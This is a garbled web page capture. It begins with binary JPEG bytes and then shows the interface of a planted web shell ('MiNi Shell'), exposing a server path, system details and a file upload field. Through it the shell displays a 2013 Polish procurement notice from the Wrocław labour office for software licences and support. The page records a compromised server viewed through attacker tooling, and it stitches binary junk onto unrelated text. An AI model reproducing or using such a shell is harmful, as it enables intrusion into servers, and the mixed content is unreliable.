JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130603/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130603/97805-N-2013.html

<p class="kh_header"><b>Wrocław: Zakup oprogramowania oraz wsparcia technicznego (maintenance)</b><br>
<b>Numer ogłoszenia: 97805 - 2013; data zamieszczenia: 03.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy we Wrocławiu , ul. Gliniana 20-22, 50-525 Wrocław, woj. dolnośląskie, tel. 71 7701 600, faks 71 7701 633.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://pup.wroclaw.ibip.pl/public/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup oprogramowania oraz wsparcia technicznego (maintenance).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> A. Opis przedmiotu zamówienia 
- zadanie nr 1 Zakup aktualizacji systemów operacyjnych
1. Przedmiot zamówienia obejmuje zakup aktualizacji systemów operacyjnych Zamawiającego: Windows XP Professional, Windows Vista Business, Windows 7 Professional do Windows 8 Professional Upgrade Government OPEN lub równoważnego, w ilości 230 szt.
 2. Przez równoważny Zamawiający rozumie system operacyjny spełniający następujące warunki:
 a) działanie jako klient usługi Active Directory i e-Directory,
 b) możliwość uruchomienia aplikacji wirtualizowanych za pomocą Novell ZENworks Application Virtualization,
 c) instalację na stacjach roboczych Zamawiającego pracujących pod kontrolą Windows XP Proffesional z zachowaniem danych oraz zainstalowanych programów i ich ustawień,
 d) pozwalający na instalację przy użyciu jednego klucza licencyjnego dla wszystkich 230 stacji roboczych oraz przeniesienie licencji na inną stację roboczą (w razie ponownej instalacji),
 e) będący najnowszą dostępną na rynku wersją systemu operacyjnego oferowaną przez producenta systemu,
 f) posiadający zapewniane przez producenta aktualizacje bezpieczeństwa instalowane automatycznie (bez ingerencji użytkownika) przynajmniej do 2023 roku,
 g) obsługujący architekturę procesorów x86-64 oraz x86-32.
 3. Wykonawca dostarczy do siedziby Zamawiającego lub na konto Zamawiającego w portalu Microsoft licencje dla aktualizacji systemów operacyjnych, o których mowa w pkt. 1, na swój koszt i ryzyko, własnym staraniem - po uprzednim powiadomieniu Zamawiającego o terminie dostawy.
 4. Wykonawca przekaże wraz z oprogramowaniem (płyty CD/DVD lub odnośniki do stron, z których można pobrać obrazy płyt) wszelkie informacje, materiały oraz dokumenty, w tym:
 a) dokumenty potwierdzające legalność oprogramowania,
 b) pisemne potwierdzenie gwarancji wystawione przez producenta,
 c) dokumentację użytkownika w języku polskim.
 5. Szczegółowy opis przedmiotu zamówienia oraz zasady realizacji zamówienia zostały zawarte we Wzorze umowy - Załącznik nr 8 do SIWZ.
B.Opis przedmiotu zamówienia 
- zadanie nr 2 Zakup oprogramowania oraz wsparcia technicznego
1. Przedmiot zamówienia obejmuje:
1) zakup oprogramowania oraz wsparcia technicznego: 
a) rozszerzenie oprogramowania GWAVA posiadanego przez Zamawiającego o moduł GWAVA Retain dla Novell GroupWise wraz z wsparciem technicznym producenta do dnia 30.09.2014 r. dla 230 skrzynek pocztowych,
b) rozszerzenie oprogramowania ZENworks posiadanego przez Zamawiającego o ZENworks Application Virtualization wraz z wsparciem technicznym producenta do dnia 30.09.2014 r. dla 230 stacji roboczych,
2) przedłużenie aktualnie posiadanego przez Zamawiającego wsparcia technicznego do dnia 30.09.2014 r. dla:

Lp.
Nazwa
Ilość
Data wygaśnięcia posiadanego  wsparcia technicznego
A
B
C
D
1
GWAVA Reload
230 skrzynek
13.08.2013
2
VMware vCenter Server 5 Essentials for vSphere, VMware vSphere 5 Essentials PLUS for 1 processor Basic Support (5x12)
6 procesorów
16.08.2013
3
Veeam Backup & Replication for VMware Enterprise Edition Tier A
3 serwery
20.08.2013
4
Novell Identity Assurance Solution 3.x
230 urządzeń
30.09.2013
5
Novell Open Workgroup Suite (NOWS)
230 urządzeń
31.08.2013
6
Novell SecureLogin
230 urządzeń
31.08.2013
7
Novell ZENworks Full Disk Encryption
230 urządzeń
31.08.2013
8
ZENworks Extension for NOWS
230 urządzeń
31.08.2013

 2. Wykonawca zainstaluje i skonfiguruje najnowszą wersję oprogramowania, o którym mowa w pkt. 1 ppkt 1 na udostępnionym sprzęcie zgodnie z potrzebami i zaleceniami Zamawiającego.
 3. Na wszystkie licencje daty graniczne obowiązywania usługi wsparcia to:
a) data początkowa tj. dzień odbioru potwierdzonego protokołem odbioru nie później niż ostatni dzień terminu realizacji niniejszej umowy lub - w przypadku przedłużenia wsparcia technicznego - data zakończenia obowiązywania dotychczasowej licencji (kolumna D powyższej tabeli),
b) data końcowa 30.09.2014 r.
 4. Przez wsparcie techniczne, o którym mowa w pkt. 1 Zamawiający rozumie:
a) dostęp do telefonicznej pomocy technicznej przez 12 godzin na dobę 5 dni w tygodniu (12x5), od poniedziałku do piątku, z czasem odpowiedzi na problem: 4 godziny,
b) udzielanie odpowiedzi na podstawowe pytania dotyczące krótkotrwałej instalacji, używania i konfiguracji,
c) bezpośrednie konsultacje telefoniczne dotyczące problemów związanych z oprogramowaniem,
d) dostęp do poprawek oprogramowania (Product Updates),
e) dostęp do aktualizacji oprogramowania oraz najnowszej wersji (Product Upgrades),
f) nieprzerwany i nieograniczony dostęp do zasobów elektronicznych w szczególności: FAQ, baz wiedzy i innych.
 5. Wykonawca dostarczy do siedziby Zamawiającego lub na konto Zamawiającego w portalu odpowiednio: GWAVA, Vmware, Veeam, Novell licencje, o których mowa w pkt. 1, na swój koszt i ryzyko, własnym staraniem - po uprzednim powiadomieniu Zamawiającego o terminie dostawy.
 6. Wykonawca przekaże wraz z oprogramowaniem (płyty CD/DVD lub odnośniki do stron, z których można pobrać obrazy płyt) wszelkie informacje, materiały oraz dokumenty, w tym:
a) dokumenty potwierdzające legalność oprogramowania,
b) pisemne potwierdzenie gwarancji wystawione przez producenta,
c) dokumentację użytkownika w języku polskim.
 7. Wykonawca udziela gwarancji na bezawaryjne działanie oprogramowania, o którym mowa w pkt. 1 ppkt 1 od daty podpisania protokołu odbioru do dnia 30.09.2014 r. lub do czasu korzystania przez Zamawiającego z usługi wsparcia technicznego (maintenance) producenta oprogramowania, określonego w pkt. 1 ppkt 1.
 8. W ramach niniejszego zamówienia Wykonawca jest zobowiązany do zapewnienia nadzoru serwisowego nad uruchomionymi systemami w okresie udzielonej gwarancji.
 9. Wykonawca zobowiązuje się wypełniać przez cały okres udzielonej gwarancji jej warunki.
 10. Szczegółowy opis przedmiotu zamówienia oraz zasady realizacji zamówienia zostały zawarte we Wzorze umowy - Załącznik nr 9 do SIWZ.
C.Opis przedmiotu zamówienia 
- zadanie nr 3 Zakup wsparcia technicznego dla urządzenia typu UTM
1. Przedmiotem umowy jest zakup wsparcia technicznego dla urządzenia typu UTM, tj. przedłużenie wsparcia technicznego oraz subskrypcji dla urządzenia Barracuda NG Firewall F600 w zakresie przynajmniej takim jak aktualnie posiadane przez Zamawiającego (serwis EU oraz IR wraz                             z wszystkimi opcjonalnymi modułami w tym: NG Secure Web Proxy, NG SSL VPN and NAC, NG Malware Protection, NG Web Filter, NG Web Security Web) od dnia wygaśnięcia aktualnie posiadanego wsparcia czyli 04.12.2013 r. na okres 12 miesięcy.
2. Wsparcie techniczne powinno zapewniać:
a) wymianę uszkodzonego urządzenia na nowe w drugim dniu roboczym, 
b) całodobowe wsparcie producenta (mailowe i telefoniczne), 
c) telefoniczne wsparcie polskiego dystrybutora (w języku polskim) dostępne od poniedziałku do piątku w godzinach 08:00 do 18:00,
d) umożliwienie wymiany uszkodzonego dysku twardego na nowy,
e) aktualizacje systemu operacyjnego urządzenia dające dostęp do nowych funkcji oraz poprawiające działanie urządzenia,
f) przedłużenie gwarancji producenta na urządzenie o jeden rok,
g) aktualizacje bezpieczeństwa systemu operacyjnego zainstalowanego na urządzeniu,
h) usługę odzysku danych Barracuda Backup Server.
3. Szczegółowy opis przedmiotu zamówienia oraz zasady realizacji zamówienia zostały zawarte we Wzorze umowy - Załącznik nr 10 do SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 48.78.00.00-9, 72.25.00.00-2, 48.77.10.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku polegania na wiedzy i doświadczeniu innych podmiotów - pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów     z zakresu wiedzy i doświadczenia na okres korzystania z nich przy wykonywaniu zamówienia -  o ile te inne podmioty będą brały udział w realizacji zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://pup.wroclaw.ibip.pl/public/?id=141872<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy we Wrocławiu, ul. Gliniana 20-22, pokój nr 508.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.06.2013 godzina 10:00, miejsce: Powiatowy Urząd Pracy we Wrocławiu, ul. Gliniana 20-22, Kancelaria (parter, pokój nr 04).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zakup aktualizacji systemów operacyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia obejmuje zakup aktualizacji systemów operacyjnych Zamawiającego: Windows XP Professional, Windows Vista Business, Windows 7 Professional do Windows 8 Professional Upgrade Government OPEN lub równoważnego, w ilości 230 szt.
 2. Przez równoważny Zamawiający rozumie system operacyjny spełniający następujące warunki:
 a) działanie jako klient usługi Active Directory i e-Directory,
 b) możliwość uruchomienia aplikacji wirtualizowanych za pomocą Novell ZENworks Application Virtualization,
 c) instalację na stacjach roboczych Zamawiającego pracujących pod kontrolą Windows XP Proffesional z zachowaniem danych oraz zainstalowanych programów i ich ustawień,
 d) pozwalający na instalację przy użyciu jednego klucza licencyjnego dla wszystkich 230 stacji roboczych oraz przeniesienie licencji na inną stację roboczą (w razie ponownej instalacji),
 e) będący najnowszą dostępną na rynku wersją systemu operacyjnego oferowaną przez producenta systemu,
 f) posiadający zapewniane przez producenta aktualizacje bezpieczeństwa instalowane automatycznie (bez ingerencji użytkownika) przynajmniej do 2023 roku,
 g) obsługujący architekturę procesorów x86-64 oraz x86-32.
 3. Wykonawca dostarczy do siedziby Zamawiającego lub na konto Zamawiającego w portalu Microsoft licencje dla aktualizacji systemów operacyjnych, o których mowa w pkt. 1, na swój koszt i ryzyko, własnym staraniem - po uprzednim powiadomieniu Zamawiającego o terminie dostawy.
 4. Wykonawca przekaże wraz z oprogramowaniem (płyty CD/DVD lub odnośniki do stron, z których można pobrać obrazy płyt) wszelkie informacje, materiały oraz dokumenty, w tym:
 a) dokumenty potwierdzające legalność oprogramowania,
 b) pisemne potwierdzenie gwarancji wystawione przez producenta,
 c) dokumentację użytkownika w języku polskim.
 5. Szczegółowy opis przedmiotu zamówienia oraz zasady realizacji zamówienia zostały zawarte we Wzorze umowy - Załącznik nr 8 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 48.77.10.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zakup oprogramowania oraz wsparcia technicznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia obejmuje:
1) zakup oprogramowania oraz wsparcia technicznego: 
a) rozszerzenie oprogramowania GWAVA posiadanego przez Zamawiającego o moduł GWAVA Retain dla Novell GroupWise wraz z wsparciem technicznym producenta do dnia 30.09.2014 r. dla 230 skrzynek pocztowych,
b) rozszerzenie oprogramowania ZENworks posiadanego przez Zamawiającego o ZENworks Application Virtualization wraz z wsparciem technicznym producenta do dnia 30.09.2014 r. dla 230 stacji roboczych,
2) przedłużenie aktualnie posiadanego przez Zamawiającego wsparcia technicznego do dnia 30.09.2014 r. dla:

Lp.
Nazwa
Ilość
Data wygaśnięcia posiadanego  wsparcia technicznego
A
B
C
D
1
GWAVA Reload
230 skrzynek
13.08.2013
2
VMware vCenter Server 5 Essentials for vSphere, VMware vSphere 5 Essentials PLUS for 1 processor Basic Support (5x12)
6 procesorów
16.08.2013
3
Veeam Backup & Replication for VMware Enterprise Edition Tier A
3 serwery
20.08.2013
4
Novell Identity Assurance Solution 3.x
230 urządzeń
30.09.2013
5
Novell Open Workgroup Suite (NOWS)
230 urządzeń
31.08.2013
6
Novell SecureLogin
230 urządzeń
31.08.2013
7
Novell ZENworks Full Disk Encryption
230 urządzeń
31.08.2013
8
ZENworks Extension for NOWS
230 urządzeń
31.08.2013

 2. Wykonawca zainstaluje i skonfiguruje najnowszą wersję oprogramowania, o którym mowa w pkt. 1 ppkt 1 na udostępnionym sprzęcie zgodnie z potrzebami i zaleceniami Zamawiającego.
 3. Na wszystkie licencje daty graniczne obowiązywania usługi wsparcia to:
a) data początkowa tj. dzień odbioru potwierdzonego protokołem odbioru nie później niż ostatni dzień terminu realizacji niniejszej umowy lub - w przypadku przedłużenia wsparcia technicznego - data zakończenia obowiązywania dotychczasowej licencji (kolumna D powyższej tabeli),
b) data końcowa 30.09.2014 r.
 4. Przez wsparcie techniczne, o którym mowa w pkt. 1 Zamawiający rozumie:
a) dostęp do telefonicznej pomocy technicznej przez 12 godzin na dobę 5 dni w tygodniu (12x5), od poniedziałku do piątku, z czasem odpowiedzi na problem: 4 godziny,
b) udzielanie odpowiedzi na podstawowe pytania dotyczące krótkotrwałej instalacji, używania i konfiguracji,
c) bezpośrednie konsultacje telefoniczne dotyczące problemów związanych z oprogramowaniem,
d) dostęp do poprawek oprogramowania (Product Updates),
e) dostęp do aktualizacji oprogramowania oraz najnowszej wersji (Product Upgrades),
f) nieprzerwany i nieograniczony dostęp do zasobów elektronicznych w szczególności: FAQ, baz wiedzy i innych.
 5. Wykonawca dostarczy do siedziby Zamawiającego lub na konto Zamawiającego w portalu odpowiednio: GWAVA, Vmware, Veeam, Novell licencje, o których mowa w pkt. 1, na swój koszt i ryzyko, własnym staraniem - po uprzednim powiadomieniu Zamawiającego o terminie dostawy.
 6. Wykonawca przekaże wraz z oprogramowaniem (płyty CD/DVD lub odnośniki do stron, z których można pobrać obrazy płyt) wszelkie informacje, materiały oraz dokumenty, w tym:
a) dokumenty potwierdzające legalność oprogramowania,
b) pisemne potwierdzenie gwarancji wystawione przez producenta,
c) dokumentację użytkownika w języku polskim.
 7. Wykonawca udziela gwarancji na bezawaryjne działanie oprogramowania, o którym mowa w pkt. 1 ppkt 1 od daty podpisania protokołu odbioru do dnia 30.09.2014 r. lub do czasu korzystania przez Zamawiającego z usługi wsparcia technicznego (maintenance) producenta oprogramowania, określonego w pkt. 1 ppkt 1.
 8. W ramach niniejszego zamówienia Wykonawca jest zobowiązany do zapewnienia nadzoru serwisowego nad uruchomionymi systemami w okresie udzielonej gwarancji.
 9. Wykonawca zobowiązuje się wypełniać przez cały okres udzielonej gwarancji jej warunki.
 10. Szczegółowy opis przedmiotu zamówienia oraz zasady realizacji zamówienia zostały zawarte we Wzorze umowy - Załącznik nr 9 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 48.78.00.00-9, 72.25.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zakup wsparcia technicznego dla urządzenia typu UTM.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem umowy jest zakup wsparcia technicznego dla urządzenia typu UTM, tj. przedłużenie wsparcia technicznego oraz subskrypcji dla urządzenia Barracuda NG Firewall F600 w zakresie przynajmniej takim jak aktualnie posiadane przez Zamawiającego (serwis EU oraz IR wraz                             z wszystkimi opcjonalnymi modułami w tym: NG Secure Web Proxy, NG SSL VPN and NAC, NG Malware Protection, NG Web Filter, NG Web Security Web) od dnia wygaśnięcia aktualnie posiadanego wsparcia czyli 04.12.2013 r. na okres 12 miesięcy.
2. Wsparcie techniczne powinno zapewniać:
a) wymianę uszkodzonego urządzenia na nowe w drugim dniu roboczym, 
b) całodobowe wsparcie producenta (mailowe i telefoniczne), 
c) telefoniczne wsparcie polskiego dystrybutora (w języku polskim) dostępne od poniedziałku do piątku w godzinach 08:00 do 18:00,
d) umożliwienie wymiany uszkodzonego dysku twardego na nowy,
e) aktualizacje systemu operacyjnego urządzenia dające dostęp do nowych funkcji oraz poprawiające działanie urządzenia,
f) przedłużenie gwarancji producenta na urządzenie o jeden rok,
g) aktualizacje bezpieczeństwa systemu operacyjnego zainstalowanego na urządzeniu,
h) usługę odzysku danych Barracuda Backup Server.
3. Szczegółowy opis przedmiotu zamówienia oraz zasady realizacji zamówienia zostały zawarte we Wzorze umowy - Załącznik nr 10 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.25.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com